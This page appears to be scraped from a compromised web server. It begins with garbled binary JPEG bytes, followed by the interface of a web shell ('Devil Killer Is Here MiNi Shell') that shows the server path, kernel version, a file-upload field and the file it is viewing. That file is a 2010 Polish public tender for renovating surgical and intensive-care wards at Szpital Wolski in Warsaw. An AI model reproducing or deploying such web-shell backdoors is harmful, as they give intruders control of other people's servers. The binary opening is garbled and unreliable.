JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/74789-N-2010.html

<p class="kh_header"><b>Warszawa: Roboty budowlane wielobranżowe
 - Przebudowa i modernizacja wraz z dostosowaniem do przepisów techniczno 
- sanitarnych Oddziałów Szpitalnych w Pawilonie nr 8 (Oddział Chirurgii Ogólnej 
i Naczyniowej - I piętro, Oddział Anestezjologii i Intensywnej Terapii - II piętro)</b><br>
<b>Numer ogłoszenia: 74789 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane wielobranżowe
 - Przebudowa i modernizacja wraz z dostosowaniem do przepisów techniczno 
- sanitarnych Oddziałów Szpitalnych w Pawilonie nr 8 (Oddział Chirurgii Ogólnej 
i Naczyniowej - I piętro, Oddział Anestezjologii i Intensywnej Terapii - II piętro).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia Przebudowa  i modernizacja  oddziałów szpitalnych w   Pawilonie nr 8    Szpitala Wolskiego - roboty budowlane wielobranżowe.  

Prace będą realizowane w ramach zadania inwestycyjnego pn. Rozbudowa i modernizacja Szpitala Wolskiego, w tym
Podzadanie Przebudowa i modernizacja wraz z dostosowaniem do przepisów techniczno-sanitarnych oddziałów szpitalnych w Pawilonie Nr 8 - Oddział Chirurgii Ogólnej i Naczyniowej - I p, Oddział Anestezjologii i Intensywnej Terapii- IIp.                                                                                         

Miejsce realizacji robót -   Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny
Zakład Opieki Zdrowotnej 01-211 Warszawa ul. Kasprzaka 17, Pawilon Nr 8

Zakres prac i oznaczeń wg kodów CPV          
Roboty budowlane w zakresie obiektów szpitalnych CPV  45215140-0   
Roboty rozbiórkowe CPV   45111100-9 45111220-6
Nadproża, wzmocnienia CPV   45262400-5 45262311-4
Ścianki działowe,  zamurowania CPV   45421141-4 45262520-2                           
Wentylacja grawitacyjna,    CPV   453311210-1 45421141-4
Stolarka drzwiowa, okienna  CPV   45421000-4 45 421141-4
Tynki , Sufity podwieszone    CPV   45410000-4  45421146-9
Osłony ścian     CPV   45442300-0
Warstwy podposadzkowe	 CPV  45320000-6 45262321-7 
Posadzki, Roboty malarskie	 CPV   45430000-0 45442100-8
Roboty dodatkowe        CPV   45111220-6 45262400-5, 45421141-4
Roboty  dachowe 	 CPV  45260000-7 45410000-4 
Roboty w zakresie okablowania elektrycznego        CPV  45311100-1
Instalowanie stacji rozdzielczych     CPV  45315700-5
Instalacje  niskiego napięcia    CPV  45315600-4 
Roboty w zakresie okablowania oraz instalacji elektrycznych  CPV 45311000-0
Montaż instalacji pioruchronnej                                 	CPV  45312311-0
Roboty instalacyjne elektryczne                                 	CPV  45310000-3
 Instalowanie okablowania komputerowego               	CPV  45314310-7
Instalowanie alarmów włamaniowych                       	CPV  45312200-9
Roboty instalacyjne gazowe                                       	CPV  45333000-0
Roboty kanalizacyjne				CPV 45231300-8
Roboty demontażowe				CPV 44160000-9
Roboty pomocnicze				CPV 45232000-2
Roboty montażowo - wentylacyjne, demontażowe	CPV 45331210-1
Roboty instalacyjne zimnej i ciepłej wody - montaż 	CPV 44160000-9
Izolacja termiczna 					CPV 45321000-3
Instalacja - CO					CPV 45232141-2
Grzejniki						CPV 44621110-3
Roboty demontażowe				CPV 45232141-2

Przedmiot zamówienia opisany jest szczegółowo przez

A.   dokumentację projektową 
temat   Projekt budowlano-wykonawczy dokumentacji dostosowawczej dla oddziałów szpitalnych w Pawilonie Nr 8  Chirurgii Ogólnej i Naczyniowej,
 Oddział Anestezjologii i Intensywnej terapii
1. P.B.W. Branża-   Architektura     opracowanie listopad 2009r.
                         -      Architektura -Aneks          opracowanie marzec 2010r. 
   Biuro Architektoniczne i Sztuk Plastycznych   SOSAK i SOSAK  -
                                                                              projektant mgr inż. arch. Stanisław Sosak 
2. P.B.W. Branża-  Technologia                          opracowanie listopad 2009r.
                            -   Technologia - Aneks           opracowanie marzec 2010r.
   Biuro Architektoniczne i Sztuk Plastycznych SOSAK i SOSAK 
                                                                              projektant mgr inż. arch. Stanisław Sosak
3. P.B.W. Branża - Konstrukcja                        opracowanie listopad 2009r
                             -   Konstrukcja- Aneks          opracowanie marzec 2010r.
   Konstrukcje Budowlane i Inżynierskie Sieczkowski - Nikoniuk    
                                                                              projektant mgr inż .Artur Sieczkowski
4. P.B.W  Branża -  Elektryczna                         opracowanie listopad 2009r
                             -  Elektryczna- Aneks            opracowanie marzec 2010r.
   Pracownia Projektowa PROEL M. Hanowski, Zb Bardzicki
                                                                               projektant   Zbigniew Bardzicki 
5. P.B.W  Branża - Teletechniczna                      opracowanie listopad 2009r.
    Pracownia Projektowa PROEL M. Hanowski  Zb.Bardzicki      
                                                                                projektant Zbigniew Bardzicki 
6.  P.B.W. Branża - Instalacje sanitarne                 opracowanie z listopada 2009r. 
                              - Instalacje sanitarne wod-kan  opracowanie   marzec 2010r.
     Biuro Architektoniczne i Sztuk Plastycznych     SOSAK i SOSAK      
                                                                             projektant mgr inż. Eligiusz Kutyna
7.  P.B.W Branża- Gazy medyczne                        opracowanie listopad 2009r.
                             -Gazy medyczne -Aneks           opracowanie marzec 2010r.
    Biuro Architektoniczne i Sztuk Plastycznych 
                                  SOSAK i SOSAK        projektant mgr inż. Andrzej Kochan  

B.  Specyfikację Techniczną Wykonania i Odbioru Robot Budowlanych

1. Branża  Architektura i Konstrukcja    Biuro Architektoniczne i Sztuk Plastycznych 
                                 SOSAK i SOSAK        projektant mgr inż. arch. Stanisław Sosak
                                                                                                 Załącznik Nr  10  do SIWZ
2. Branża Elektryczna Pracownia Projektowa PROEL M. Hanowski, Zb. Bardzicki-
                                                                            projektant Zbigniew Bardzicki
                                                                                                  Załącznik Nr 11  do SIWZ
3) Branża: Instalacja okablowania strukturalnego, systemu sygnalizacji włamania, kontroli 
    dostępu SSWiKD                                         projektant mgr inż. Rafał Czarnecki
                                                                                                  Załącznik Nr 12  do SIWZ
4) Branża : Instalacje sanitarne  Biuro Architektoniczne i Sztuk Plastycznych 
                                 SOSAK i SOSAK         projektant mgr inż. Eligiusz Kutyna 
								  Załącznik Nr 13   do SIWZ
5) Branża Gazy Medyczne  Biuro Architektoniczne i Sztuk Plastycznych 
                                 SOSAK i SOSAK        projektant mgr inż. Andrzej Kochan
                                                                                               Załącznik Nr 14   do SIWZ 
C)    Przedmiary robot:
 
1.  Przedmiar robót
                roboty budowlane                                              Załącznik Nr  1a  do SIWZ
                roboty budowlane-aneks                                     Załącznik Nr  1b  do SIWZ
2.  Przedmiar robót
                    instalacja elektryczne                                           Załącznik Nr 2 do SIWZ 
3.  Przedmiar robót
                   instalacje teletechniczne                                       Załącznik Nr 3 do SIWZ
4. Przedmiar robót
                    instalacja gazów medycznych                              Załącznik Nr 4 do SIWZ
5.  Przedmiar robót
                    instalacja c.o-                                                       Załącznik Nr  5 do SIWZ
6.  Przedmiar robót
                  wentylacja mechaniczna                                        Załącznik Nr  6 do SIWZ
7.  Przedmiar robót
                 klimatyzacja                                                            Załącznik Nr  7 do SIWZ
8.  Przedmiar robót
                instalacja wodociągowa                                           Załącznik Nr  8 do SIWZ
9.  Przedmiar robót
                 kanalizacja                                                              Załącznik Nr  9 do SIWZ
które stanowią podstawę do określenia ceny przedmiotu zamówienia .

Sporządzone kosztorysy ofertowe przez oferentów muszą być zgodne z ww  przedmiarami robót załączonymi do SIWZ bez możliwości dokonywania zmian.
Z  dokumentacją projektową można  zapoznać się  w Sekcji Inwestycji i Remontów  Szpitala Wolskiego  tel.0-22-38 94 714.

Prace  budowlane wielobranżowe będą realizowane  w dwóch  etapach  
I etap -  rozpoczęcie prac: od daty protokółu  wprowadzenia na budowę
zakończenie prac             wg przyjętej oferty
Zakres prac     I piętro -  część  B  plus  fragment części środkowej pawilonu nr 8,
w pozostałej części  I piętra  będzie funkcjonował Oddział łóżkowy chirurgiczny
II etap - rozpoczęcie prac            wg przyjętej oferty
zakończenie prac              wg przyjętej oferty
Zakres prac     I piętro - część A plus fragment części środkowej 
oraz  II piętro - część A plus fragment części środkowej Pawilonu nr 8

Zakończenie etapu budowy oznacza oddanie części prac umożliwiających prowadzenie działalności medycznej Oddziału .
Dopuszcza się prowadzenie równocześnie dwu etapów budowy wyłączenie pracy oddziału w okresie nie dłuższym niż 4 tygodnie.

Nadmieniamy, że realizacja robót  będzie przebiegała w czynnym obiekcie szpitalnym tj. Pawilonie Nr 8 Szpitala Wolskiego.
 
Użytkownicy Pawilonu Nr 8 
parter   -  Szpitalny Oddział Ratunkowy,  Diagnostyka  Laboratoryjna,  Administracja  
I piętro  -  Oddział Chirurgiczny  prace budowlane - I  i II etap
II piętro -  Blok Operacyjny, Oddział Anestezjologii i Intensywnej Terapii  prace budowlane - II   etap 
                                       
Szczegółowy  technologicznie  podział  wielobranżowych  prac budowlanych nie kolidujących z pracą  innych Użytkowników pawilonu Nr 8 wchodzący w dany etap - będzie ustalony z   Zamawiającym -Inwestorem Zastępczym oraz Użytkownikiem. 

Uwaga   
1.Instalacja gazów medycznych jest zakwalifikowana  jako wyrób medyczny  odbiór instalacji osobnym protokółem końcowym. 
2.W czasie prowadzenia robot Wykonawca jest zobowiązany zapewnić bezkolizyjne funkcjonowanie pozostałych  Oddziałów w  budynku  - pawilonu  Nr 8.
3. Oferent powinien zapoznać się z: przedmiotem specyfikacji, dokumentacją projektową w celu ustalenia i przekazania  prawidłowego Harmonogramu rzeczowo- finansowego robót,  nie kolidującego  z czynnym obiektem brak możliwości prac głośnych w godzinach wieczornych i nocnych.	
4. Cena umowna musi uwzględniać  także wszystkie koszty towarzyszące związane z realizacją przedmiotu zamówienia takie jak 
- koszty organizacji, eksploatacji i likwidacji  zaplecza budowy 
 - koszty  sporządzenia wszystkich niezbędnych dokumentów 
 protokóły z badań, pomiarów, koniecznych do odbioru robót zgodnie z
obowiązującym  Prawem Budowlanym.
5.Prace będą realizowane na podstawie  Decyzji - Pozwolenia na budowę  która zostanie przekazania Wykonawcy robót  przy  Protokóle wprowadzenia na budowę.  
6. Zleceniodawca decyduje o kolorystyce, fakturze materiałów zastosowanych do wbudowania.
7. Wszystkie prace należy wykonać zgodnie z dokumentacja projektową, przepisami
prawa budowlanego, polska normą, przepisami B.H.P. i p. pożarowymi.
8. Zleceniodawca wymaga wykonania prac z obowiązującymi standardami. 
9. Kierownik budowy jest zobowiązany do przedłożenia min, 8 dni przed  wprowadzeniem na budowę wszystkich niezbędnych dokumentów wynikających z  Prawa Budowlanego .
10. Wszystkie prace należy wykonać zgodnie z dokumentacją projektową, przepisami
prawa budowlanego,  polska normą, przepisami B.H.P. i p. poż.    
11. Prosimy o zapoznanie się z przedmiotem SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 Ustawy w przypadku wystąpienia okoliczności polegających na konieczności powtórzenia tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.40-0, 45.11.11.00-9, 45.11.12.20-6, 45.26.24.00-5, 45.26.23.11-4, 45.42.11.41-4, 45.26.25.20-2, 45.33.11.21-1, 45.42.11.41-4, 45.42.10.00-4, 45.42.11.41-4, 45.41.00.00-4, 45.42.11.46-9, 45.44.23.00-0, 45.32.00.00-6, 45.26.23.21-7, 45.43.00.00-0, 45.44.21.00-8, 45.11.12.20-6, 45.26.24.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 153.208,22 zł. (słownie: sto pięćdziesiąt trzy tysiące dwieście osiem i 22/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">14)	Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy, o spełnieniu warunków udziału w postępowaniu wskazanych w art. 22 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych ,
Wypełniony formularz oferty - załącznik nr 17 do SIWZ 
Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 18 do SIWZ.
Załącznik nr 19 - oświadczenie.
Kosztorysy ofertowe w wersji uproszczonej, wypełnione zgodnie z kosztorysami ślepymi, przedmiarami i specyfikacją  warunków technicznych  wykonania i odbioru robót stanowiącymi załączniki  specyfikacji. 
